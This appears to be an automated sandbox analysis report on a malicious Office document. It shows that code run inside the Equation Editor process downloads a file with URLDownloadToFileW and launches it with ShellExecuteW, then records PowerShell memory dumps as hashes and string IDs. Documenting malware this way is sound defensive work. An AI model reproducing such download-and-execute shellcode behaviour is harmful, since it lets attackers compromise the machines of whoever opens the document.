                                                                      Attribute VB_Customizable = True


                                                                        Execution Graph

                                                                        Execution Coverage:16.8%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:61.9%
                                                                        Total number of Nodes:42
                                                                        Total number of Limit Nodes:4
                                                                        execution_graph (rendered graph omitted): nodes 35703e7-3570669 in the EQNEDT32 memory dump, calling ExitProcess, LoadLibraryW, URLDownloadToFileW, ShellExecuteW and GetPEB

                                                                        Callgraph

                                                                        Control-flow Graph (rendered graph omitted): function 35705dc, blocks 35705dc-35706ac; URLDownloadToFileW, calls 35705f5 and 357060a, ShellExecuteW at 3570604, call 357062f, ExitProcess at 357062a-3570634
                                                                        APIs
                                                                        • URLDownloadToFileW.URLMON(00000000,03570534,?,00000000,00000000), ref: 035705DE
                                                                          • Part of subcall function 035705F5: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0357061C
                                                                          • Part of subcall function 035705F5: ExitProcess.KERNEL32(00000000), ref: 03570634
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.456882601.0000000003570000.00000004.00000020.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3570000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID: DownloadExecuteExitFileProcessShell
                                                                        • String ID:
                                                                        • API String ID: 3584569557-0
                                                                        • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                                        • Instruction ID: 8fbd04e570ae48a05d7d9b5d72981ba315d8ccf25770df5ca5267e031f787b63
                                                                        • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                                        • Instruction Fuzzy Hash: BFF0279058C3442DE632E7747CBEF6A6FE8BFC1B40F150889B1424F0F2E994840486A9

                                                                        Control-flow Graph (rendered graph omitted): function 357060a, blocks 357060a-35706ac; ShellExecuteW at 357060a-357061c, call 357062f at 357061e, ExitProcess at 357062a-3570634
                                                                        APIs
                                                                        • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0357061C
                                                                          • Part of subcall function 0357062F: ExitProcess.KERNEL32(00000000), ref: 03570634
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.456882601.0000000003570000.00000004.00000020.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3570000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID: ExecuteExitProcessShell
                                                                        • String ID:
                                                                        • API String ID: 1124553745-0
                                                                        • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                                        • Instruction ID: c40006f2870c131050379b775d1411b933346464b57d5f8538092dcf36e42a0a
                                                                        • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                                        • Instruction Fuzzy Hash: 63014E9455430215DF30F668783DBB9ABD4BBC1710FCC485BE5810F4F5E15480C34AE9

                                                                        Control-flow Graph (rendered graph omitted): function 35705f5, blocks 35705f5-35706ac; call 357060a, ShellExecuteW at 3570604-3570626, call 357062f, ExitProcess at 357062a-3570634
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.456882601.0000000003570000.00000004.00000020.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3570000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID: ExecuteExitProcessShell
                                                                        • String ID:
                                                                        • API String ID: 1124553745-0
                                                                        • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                                        • Instruction ID: f82e5ba485dc28a2766776edb07ac1763a0dc4a6372f01863a30e434d1eb6f52
                                                                        • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                                        • Instruction Fuzzy Hash: A701496056830124EB70E7787CBCBAEAAD8BBC1700F98885EE4814F4F1E294844386AD

                                                                        Control-flow Graph (rendered graph omitted): function 3570509, blocks 3570509-35705da; LoadLibraryW at 3570509-357050b, call 3570523, call 35705dc at 3570517-3570584
                                                                        APIs
                                                                        • LoadLibraryW.KERNEL32(035704FB), ref: 03570509
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.456882601.0000000003570000.00000004.00000020.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3570000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 1029625771-0
                                                                        • Opcode ID: 78a7489c430338153a31ca61fdfe97268e92a922119e775e7e1a099b5210e4b4
                                                                        • Instruction ID: 7626c3d0ff2f069cbd8f164b2a6835a893612209efd776c21285ecd0cc9ee675
                                                                        • Opcode Fuzzy Hash: 78a7489c430338153a31ca61fdfe97268e92a922119e775e7e1a099b5210e4b4
                                                                        • Instruction Fuzzy Hash: 0F31E2D280C7D12FDB17C634AC7A614BFA53923144B0DCACFD8C60A4E3E3589101C752

                                                                        Control-flow Graph (rendered graph omitted): function 357062f, single block 357062f-3570634; ExitProcess
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(00000000), ref: 03570634
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.456882601.0000000003570000.00000004.00000020.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3570000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                        • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                                        • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                        • Instruction Fuzzy Hash:

                                                                        Control-flow Graph (rendered graph omitted): function 3570636, blocks 3570636-357065b; GetPEB at 3570636-3570641, call 357065e at 3570644-3570655
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.456882601.0000000003570000.00000004.00000020.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3570000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                        • Instruction ID: 7557719fa584f282003110c11fe5b8eb6900e6605718e0ca5b042fe7c109ef10
                                                                        • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                        • Instruction Fuzzy Hash: 61D052752025028FC718DF04E990E12F3BAFFD8610B28C268E0044B669D730EC92CAD4

                                                                        Control-flow Graph (rendered graph omitted): function 3570404, blocks 3570404-35704f2; ExitProcess at 3570404-3570423, calls 357041d, 3570439, 3570460 and 35704f4
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(035703F2), ref: 03570404
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.456882601.0000000003570000.00000004.00000020.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3570000_EQNEDT32.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: 22f6b6b3b61817ca39fc1bbd9dfb3415d3a36381e95bd7110df24cf54c0947b3
                                                                        • Instruction ID: 654ffd381a6b3a4d4b576430611397e66c351365660292bd4888b787305a8332
                                                                        • Opcode Fuzzy Hash: 22f6b6b3b61817ca39fc1bbd9dfb3415d3a36381e95bd7110df24cf54c0947b3
                                                                        • Instruction Fuzzy Hash: 623178A680D7C11FDB16DB70BA6A115FFA6796211070D86CFC5860F5F3E368D605C392
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.472777822.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_19d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 52b0bd1ea27a769085388a26fb6a0c2245e76a058cfe19039f7d74f2afca11d0
                                                                        • Instruction ID: aa9237318265e5a845e30c79d6e515d5aea1595cc128f5b27d3e835e7fdb6d7b
                                                                        • Opcode Fuzzy Hash: 52b0bd1ea27a769085388a26fb6a0c2245e76a058cfe19039f7d74f2afca11d0
                                                                        • Instruction Fuzzy Hash: 8801A271504380AAEB204E29EC84B67FFD8EF41724F2C851AFC495B286C779D845DAB2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.472777822.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_19d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 18ed8002776f595468606f2ec0fa9412434331c2b6277b7cd556e033003de11f
                                                                        • Instruction ID: f9a5902756e8b00e4ce193d42d1c97bdb6f8586d2f8ec2dd336e31c135054c0b
                                                                        • Opcode Fuzzy Hash: 18ed8002776f595468606f2ec0fa9412434331c2b6277b7cd556e033003de11f
                                                                        • Instruction Fuzzy Hash: 55F06271404344AFEB108A16DCC4B66FFD8EB41724F18C55AED485F686C3799C44CAB1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$8#f$8#f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$tPp$tPp$tPp$tPp$$p
                                                                        • API String ID: 0-1808826156
                                                                        • Opcode ID: 4eda78791f0439306f736a668b745cb4ca9a2e296f0e4d9b5a26a3220771ab4a
                                                                        • Instruction ID: 0d7369d90a521aebbe2df260c9ed407d46b120d92340cc6c3b5b05016e5c66c0
                                                                        • Opcode Fuzzy Hash: 4eda78791f0439306f736a668b745cb4ca9a2e296f0e4d9b5a26a3220771ab4a
                                                                        • Instruction Fuzzy Hash: 55921271B043009FCB199A68D810B6BBBB2EFD5310F2884BBD545DB395DA79CC42CB96
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'p$4'p$4'p$4'p$L4p$L4p$L4p$`\f$`\f$`\f$`\f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$tPp$tPp$$p$$p$[f$[f$[f$[f
                                                                        • API String ID: 0-1943658126
                                                                        • Opcode ID: 51c4fd35ecaff4af2cdba3465e4b56c94c7169ae3041f0ca0d15723a22daac12
                                                                        • Instruction ID: 05d995d3bc68343a0ab5c5e9ae2c68d784de4f043cb1ac4f916a7f16c6318a2f
                                                                        • Opcode Fuzzy Hash: 51c4fd35ecaff4af2cdba3465e4b56c94c7169ae3041f0ca0d15723a22daac12
                                                                        • Instruction Fuzzy Hash: C0E2C130B042049FDB15DB68D854BABBBB2AF85310F25807AE846AF3D5CB35DC52CB56
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'p$4'p$4'p$4'p$4'p$4'p$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f
                                                                        • API String ID: 0-3723372221
                                                                        • Opcode ID: 11458e0d5c3a184e9bfbf8bba8dab6f0de46cb9a63cbc842d6abfe7a99806dcd
                                                                        • Instruction ID: 64c2a7fdb4fad9474f10d4817a280c28b12dec6a2a63f517ef7b78c3a03d46b4
                                                                        • Opcode Fuzzy Hash: 11458e0d5c3a184e9bfbf8bba8dab6f0de46cb9a63cbc842d6abfe7a99806dcd
                                                                        • Instruction Fuzzy Hash: 0E421671B042009FCB249F28981066BBFFAAFD5312F24847BD945EB395DA35CE42C796
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0Up$4'p$4'p$4'p$4'p$h%f$h%f$h%f$h%f$h%f$h%f$h%f$h%f$[f$[f
                                                                        • API String ID: 0-551287460
                                                                        • Opcode ID: fe3a85db22bf6a3385971449ed6dd7f1ec0264a180e311003446ccdc57d9c38b
                                                                        • Instruction ID: a596586a3a719991df571051be0bb00cce8cde155840f9a069078d87588546b8
                                                                        • Opcode Fuzzy Hash: fe3a85db22bf6a3385971449ed6dd7f1ec0264a180e311003446ccdc57d9c38b
                                                                        • Instruction Fuzzy Hash: 9F120331B042018FCB149F68D450AABBFFAAFD5311B24807BD545EB392DA39DE02C796
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'p$4'p$4'p$4'p$D<+$D<+$d=+$h%f$h%f$$p$$p$$p
                                                                        • API String ID: 0-1980983107
                                                                        • Opcode ID: feb03b57519fa112fdd49b356c6bfd3bf4bae5515924c3fb090a1caed45214f5
                                                                        • Instruction ID: 7645bbc7aafba05a83379b0b9284f2f1001917afa73be5245e40e20dc50857a3
                                                                        • Opcode Fuzzy Hash: feb03b57519fa112fdd49b356c6bfd3bf4bae5515924c3fb090a1caed45214f5
                                                                        • Instruction Fuzzy Hash: C1A1F430B043019FDB299A78941077BBBB2AFC5310F24847BC545EB2D2DA79DD52C7A6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'p$tPp
                                                                        • API String ID: 0-2826180314
                                                                        • Opcode ID: ee6dde35328a3dc6a208cbf772221942dbc299fd801398d54430e39a61ab4ded
                                                                        • Instruction ID: 88648aa0e2bea7dcea43664dfd780cc2036dec350c53624c6680fc637557f223
                                                                        • Opcode Fuzzy Hash: ee6dde35328a3dc6a208cbf772221942dbc299fd801398d54430e39a61ab4ded
                                                                        • Instruction Fuzzy Hash: 77318E35A00A049BDB24CA19C441B6BB7E6EF88311F19C0B7D605AB395DB7ADC41CFD9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: tPp
                                                                        • API String ID: 0-1477601333
                                                                        • Opcode ID: 79b34aeb9feb25f320024d6f8fd86be4f097d0c1ca9ef57ae8f6e054d1b9ed3f
                                                                        • Instruction ID: 8b8c3b07bfdba2d9888b50f42ddaf9ed71dd07d7bfe096427e82e6033f550145
                                                                        • Opcode Fuzzy Hash: 79b34aeb9feb25f320024d6f8fd86be4f097d0c1ca9ef57ae8f6e054d1b9ed3f
                                                                        • Instruction Fuzzy Hash: 93419630A093808FC7128B648854A6AFFB1AF87314F1980EFD994AF2E7C6759C45C756
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'p
                                                                        • API String ID: 0-481844870
                                                                        • Opcode ID: e4738d95e43b6cb6adfd84b58ac4b0658d483fffa89737a4de70a025e800cc02
                                                                        • Instruction ID: 314118bd36c7b7c90e6cc0ed79b54ed08088bf413dd86815e6bc248a5061c5dc
                                                                        • Opcode Fuzzy Hash: e4738d95e43b6cb6adfd84b58ac4b0658d483fffa89737a4de70a025e800cc02
                                                                        • Instruction Fuzzy Hash: 89219F30A00205CFCB24DF69C54066BB7E1AB94350F16807BD00AAB392D738CDA1CBA5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471045286.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_230000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 829b448cfe8f6a0ddc9856bc5db1a20a51aa584793a904f61eb06799a895a5c3
                                                                        • Instruction ID: b4ec72e64486876db70d837cba13c7d15845a8b6db4b697d3d3182f1b7d989bf
                                                                        • Opcode Fuzzy Hash: 829b448cfe8f6a0ddc9856bc5db1a20a51aa584793a904f61eb06799a895a5c3
                                                                        • Instruction Fuzzy Hash: 15323BB4A10219AFDB15CFA8D494A9DFBF2BF88310F24C559E844AB355C770EE85CB90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471045286.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_230000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 45f3fdffb76c7032bd952dffe87f5a4a2dfc07ed9a21a624b4cc6190cdeec14d
                                                                        • Instruction ID: cf5d8f9c4e97e22216cd1d2af7992339ba564162b47e452c182fbc1b55f00b31
                                                                        • Opcode Fuzzy Hash: 45f3fdffb76c7032bd952dffe87f5a4a2dfc07ed9a21a624b4cc6190cdeec14d
                                                                        • Instruction Fuzzy Hash: 0D512C74A10209AFCB04CFA8D495AADFBF6BF88314F64C559E804AB355C735EE86CB50
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e001c849404bce072ec7949aa74160153ae647d0e4d649dce6a038d57bc2de9c
                                                                        • Instruction ID: 38472f396053164d4d5706aae90fd2cad3bd9b968974b46cc85f28afbb35e827
                                                                        • Opcode Fuzzy Hash: e001c849404bce072ec7949aa74160153ae647d0e4d649dce6a038d57bc2de9c
                                                                        • Instruction Fuzzy Hash: 89419670A04200CFCB248F658581A6B7FBAAB85752B1880BBDD05AF3D5DB39DE41C759
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d91675d91042d177864f8d7f249a60c3a2d3b937f276c1d354d9e93bccd1dc0e
                                                                        • Instruction ID: da1828099516e53544d4aa6a50880962bde150350cefe2792937e76bdece6fdc
                                                                        • Opcode Fuzzy Hash: d91675d91042d177864f8d7f249a60c3a2d3b937f276c1d354d9e93bccd1dc0e
                                                                        • Instruction Fuzzy Hash: 84217430B00205CFCB24DF54C544A6ABFBAAB88712F14827BD908AB395D739DE45CB99
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7a3bc3f235aa2a3f97458a173c226a9a34cf27bce7c75258080bc2769e93eeef
                                                                        • Instruction ID: 067eb4fde3ac5b179fa247f08c6a2f2a14a6eda5d443df59cad81c7040b14947
                                                                        • Opcode Fuzzy Hash: 7a3bc3f235aa2a3f97458a173c226a9a34cf27bce7c75258080bc2769e93eeef
                                                                        • Instruction Fuzzy Hash: A71108B07483846FD72557748C65BAE6FB6DF96300F1844ABE582DF2D7D8698C0A8322
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471045286.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_230000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 496b2c290a24602ae1f556a6c42f11c3648d564ca23c50f72d9b12e0d4a99d06
                                                                        • Instruction ID: 5542856b76586a28bae9a48468a505f1b99d3dca8b12926a7ce76c1c88fd2cc6
                                                                        • Opcode Fuzzy Hash: 496b2c290a24602ae1f556a6c42f11c3648d564ca23c50f72d9b12e0d4a99d06
                                                                        • Instruction Fuzzy Hash: 281104B4A10209AFDB05CFA8D485B9DBBF6AF88314F24C459E404AB361C775EE86CB54
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.470973341.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_15d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 724f6b67d93bcdb683f0a52258f318a604795ee684f1af0c1885efb679c41a07
                                                                        • Instruction ID: d68f4f22afd18a02c43e8bac4b475ef0b7c9c87cfe989fef745f97c85dbe689d
                                                                        • Opcode Fuzzy Hash: 724f6b67d93bcdb683f0a52258f318a604795ee684f1af0c1885efb679c41a07
                                                                        • Instruction Fuzzy Hash: 69018471504340EAE7254E15D884B66BF98DF41725F28841AFC554E2C6C7799849C7B1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.470973341.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_15d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bbff83bfc4066dc28dfcf422e90692959c9715e923fe4181125c05d526be179b
                                                                        • Instruction ID: c44852a07059b69472040e39f3083440e0556687a70b776dbed26ba32108f895
                                                                        • Opcode Fuzzy Hash: bbff83bfc4066dc28dfcf422e90692959c9715e923fe4181125c05d526be179b
                                                                        • Instruction Fuzzy Hash: D401526140D3C09FD7124B259C94B62BFB4DF53225F1980DBE8848F2D7C2699848C772
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 38773428ff7fcfbc1edf055f3eaa947a725de2272233bb9381eef21655674a02
                                                                        • Instruction ID: 4cf7ff13596293a7ab48095ab639a623c0e75b907391970076e89d071d2821b0
                                                                        • Opcode Fuzzy Hash: 38773428ff7fcfbc1edf055f3eaa947a725de2272233bb9381eef21655674a02
                                                                        • Instruction Fuzzy Hash: EBF0227074030867DA24A6758816BAF68BBDFC8700F548429F906AF3C5DDB2DC048366
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e202cb6b642db88e7b4f1004e581b47d029330acfdff2bb6b22b7986edd3ab3c
                                                                        • Instruction ID: 46403adb0b3aea9f502119ee8c2e6b24e0681737db40aa0978975d06aac33c9c
                                                                        • Opcode Fuzzy Hash: e202cb6b642db88e7b4f1004e581b47d029330acfdff2bb6b22b7986edd3ab3c
                                                                        • Instruction Fuzzy Hash: 6BE0EC367010159BD744CA89D8919AAF375FFC8228B24C1AAD919CB292CB33ED17CB90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (:+$(:+$(:+$4'p$4'p$H;+$L4p$L4p$L4p$L4p$L4p$L4p$L:+$L:+$L:+$$p$$p
                                                                        • API String ID: 0-2406725063
                                                                        • Opcode ID: 1d421a294e9b39e2f0d24511831b6aa3feba52be4c8c544464f4c20531a30f87
                                                                        • Instruction ID: c80fa4a889b80b763add2679f080311b3164d477bb4a96f0291ef6de7b501e98
                                                                        • Opcode Fuzzy Hash: 1d421a294e9b39e2f0d24511831b6aa3feba52be4c8c544464f4c20531a30f87
                                                                        • Instruction Fuzzy Hash: 37E1E531704204EFCB259A68D850BAF7BA2AFC5310F18847BE945AB3D5CB79CD41CB96
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (Fc$(Fc$(Fc$4'p$4'p$L4p$L4p$L4p$l;+$l;+$l;+
                                                                        • API String ID: 0-506421187
                                                                        • Opcode ID: 7067728f458a608f75cd4f97290846ae62169421a34ebba95eb831b9553bdc8f
                                                                        • Instruction ID: b16791d6fad0a2612532c146f4b96d36edcca65d9871b78887d082bebe117e96
                                                                        • Opcode Fuzzy Hash: 7067728f458a608f75cd4f97290846ae62169421a34ebba95eb831b9553bdc8f
                                                                        • Instruction Fuzzy Hash: 208127317003449FCB259A68C8507AF7BA2AFC4310F18847BE951AB3D6CB79DD51CB96
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.471111093.0000000000400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_400000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `\f$`\f$tPp$tPp$tPp$tPp$$p
                                                                        • API String ID: 0-851305547
                                                                        • Opcode ID: 3a5147a2fc6f9a9b4d174d1de1b23bd5568b6a150933730b4d1dffdd1ebed389
                                                                        • Instruction ID: 92fdc72d2a772aaa7820efa23ab4aa02937674f02e5be7b0e4812f7b9c0f4e5f